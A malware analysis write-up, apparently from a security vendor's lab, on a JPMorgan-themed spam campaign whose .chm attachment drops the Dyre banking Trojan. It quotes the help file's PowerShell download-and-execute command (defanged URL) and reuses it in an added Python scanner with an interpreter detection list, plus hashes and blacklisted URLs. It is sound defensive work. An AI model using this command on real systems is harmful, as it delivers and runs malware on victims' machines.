A fresh malware sample was recently spotted using a Microsoft Compiled HTML Help file attached to spam messages. A Microsoft Help file is a binary container that bundles a set of HTML files; it usually has a .chm or .hlp extension.
The malicious help file analyzed here – a .chm file – arrived via a spam email posing as a message from JPMorgan Chase & Co., a global financial services firm. The text of the email is as follows:
As your personal manager, I would like to inform you that the terms for your credit agreement terms have been changed according to the new bank policy. Please consult the following Attachment to learn the new terms.
The email also carries an attachment named “cannon.zip”, which in turn contains a .chm file named “Message.chm”.
When the .chm is opened, a command prompt window appears momentarily, a hint that something is running in the background.
Viewing the HTML source shows that a PowerShell command, launched through cmd.exe, is used to download and execute another file:
value=",cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile('hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe','%TEMP%natmasla2.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%natmasla2.exe')">
<PARAM name="Item2" value="273,1,1">
The script downloads a file from a known malware-hosting site, saves it in the TEMP folder as natmasla2.exe, and immediately executes it through the Shell.Application ShellExecute method.
The first downloaded file then contacts a PHP resource and receives instructions to download a second file, which contains Dyre/Dyreza. As noted recently, Dyre is a banking botnet Trojan with other capabilities.
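The post's snippet is the classic CHM shortcut-object pattern: an OBJECT whose Item1 parameter hands a command line to cmd.exe. A defender triaging a suspicious help file wants to find that pattern in the HTML pages unpacked from the .chm and pull out the download URL and drop path for blocking. The Python below is an added example written for this page, not ThreatTrack's code and not from the post; the sample HTML is constructed from the fragment quoted above, and the PARAM name `Item1` for the command line is an assumption, since the post's excerpt cuts that part of the tag off.

```python
"""Triage helper: find CHM shortcut OBJECTs that launch a shell interpreter.

Added example (not ThreatTrack's code). Feed it the HTML files unpacked
from a .chm; it reports every OBJECT whose Item1 parameter runs cmd,
powershell or a similar interpreter, with any URLs and %TEMP% drop paths
found in the command line.
"""
import re
from html.parser import HTMLParser

# Constructed sample built from the fragment quoted in the post. The
# parameter name "Item1" is assumed: the post's excerpt starts at value=.
SAMPLE_HTML = '''
<OBJECT id=x width=1 height=1>
<PARAM name="Item1" value=",cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile('hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe','%TEMP%natmasla2.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%natmasla2.exe')">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<p>Ordinary help text that should not be flagged.</p>
'''

# Interpreters that have no business being launched from a help page.
SHELL_RE = re.compile(
    r"\b(cmd(\.exe)?|powershell(\.exe)?|wscript|cscript|mshta|rundll32)\b", re.I)
# Accepts both live (http) and defanged (hxxp) URLs so blocklist material
# copied from reports is picked up as well.
URL_RE = re.compile(r"\bh[xt]{2}ps?://[^\s'\"()]+", re.I)
DROP_RE = re.compile(r"%TEMP%[^'\"\s;()]*", re.I)


class ShortcutObjectScanner(HTMLParser):
    """Collects PARAM name/value pairs per OBJECT and evaluates Item1."""

    def __init__(self):
        super().__init__()
        self.in_object = False
        self.params = {}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag == "object":
            self.in_object = True
            self.params = {}
        elif tag == "param" and self.in_object:
            a = {k.lower(): (v or "") for k, v in attrs}
            self.params[a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag.lower() == "object" and self.in_object:
            self._evaluate()
            self.in_object = False

    def close(self):
        super().close()
        if self.in_object:  # OBJECT never closed: sloppy or truncated markup
            self._evaluate()
            self.in_object = False

    def _evaluate(self):
        # Item1 of a CHM shortcut object is "window,program,arguments".
        parts = self.params.get("item1", "").split(",", 2)
        if len(parts) < 2:
            return
        program = parts[1].strip()
        args = parts[2] if len(parts) == 3 else ""
        cmdline = f"{program} {args}".strip()
        if not SHELL_RE.search(cmdline):
            return
        self.findings.append({
            "program": program,
            "command_line": cmdline,
            "urls": list(dict.fromkeys(URL_RE.findall(cmdline))),
            "drop_paths": list(dict.fromkeys(DROP_RE.findall(cmdline))),
            # Item2 is the window message the control posts to itself;
            # 273 is WM_COMMAND (0x0111), the click that fires the shortcut.
            "item2": self.params.get("item2"),
        })


def scan_html(html: str) -> list:
    """Return one finding dict per shell-launching shortcut OBJECT."""
    scanner = ShortcutObjectScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for hit in scan_html(SAMPLE_HTML):
        print(f"program={hit['program']} urls={hit['urls']} "
              f"drop={hit['drop_paths']} item2={hit['item2']}")
```

Run it over every .htm/.html unpacked from the help file (any archive tool that understands the CHM format will extract them). Matching on Item1 rather than on a specific URL or hash means the check still fires when the campaign rotates its download host, which is exactly the part of this sample that is cheapest for the attacker to change.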
File hashes:
- chm: 14b166abd7279baa483cfc6e33fc5a3e
- First file (exe): e821100cd69a0902d6ac5b1e56874692
- Second file (php): 72841b43391206f983b0fa2ea0be331a
VIPRE detections:
- .chm is detected by VIPRE as CHM.Generic.a (v)
- First download is detected by VIPRE as Malware!Drop
- Second download is detected by VIPRE as Win32.Generic!BT
VIPRE blacklists both URLs:
- First download: hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe
- Second download: hxxp://nsgatewayllc.com/news/rss.php
The malicious spam carrying this attachment did not originate from JPMorgan Chase or Microsoft. There is no evidence that JPMorgan, Microsoft, or any of their systems have been compromised.
Credit: Dean Lawrence M. Bueno – Malware Researcher
About the author: ThreatTrack Security Labs